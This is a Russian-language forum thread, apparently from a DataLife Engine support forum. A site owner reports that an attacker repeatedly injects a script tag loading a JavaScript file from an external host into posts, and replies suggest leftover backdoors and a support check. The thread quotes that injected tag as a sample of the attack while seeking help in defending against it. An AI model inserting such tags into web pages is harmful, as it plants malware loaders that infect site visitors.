Перейти к публикации

Атака на скрипт


Рекомендованные сообщения

Добрый день.

Сайт http://vologda-new.ru

Версия скрипта 8.5 дописанная.

Есть проблема:

Кто-то обнаружил уязвимость в скрипте и размещает в тексте постов ссылки на скрипт с вирусом.

<script src=\"http://ivan81.ucoz.ru/engine.js\" type=\"text/javascript\"></script>

Было подозрение на предыдущих разработчиков, которые начинали натягивать на скрипт шаблон. Поменяли пароли на хостинг, ftp, email, админку и т.п. (сразу отмечу, что когда я начал заниматься сайтом я установил неизмененную на тот момент версию dle? а потом начал дорабатывать, так что backdoor не должно быть)

Все равно ссылки появляются, только уже измененные. Все заплатки на сайт установлены. На 9.2 пока не решаемся перейти, т.к. портал работает и не хочется терять посетителей отладкой нового скрипта и доработок.

Лог просматривать тяжело, т.к. из-за большого числа посетителей что-либо разобрать и найти подозрительное сложно.

Вопрос, как обнаружить где косяк и как его исправить?

Ссылка на сообщение
Поделиться на других сайтах

alextk, пишите мне в ICQ и я помогу Вам решить Вашу проблему :rolleyes:

Ссылка на сообщение
Поделиться на других сайтах

alextk,

После устновки патчей безопасности, остались на сервере бекдоры оставленные злоумышленниками после первого раза, когда патчи еще не стояли.

Вам нужно отправить запрос на проверку вашего сайта в службу поддержки http://dle-news.ru/index.php?do=feedback предоставить доступ по FTP и к админпанели скрипта, чтобы очистить ваш сайт от бекдоров. То что они есть это точно, их теперь нужно найти, для этого и отправляйте запрос в службу поддержки, для проверки вашего сайта.

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...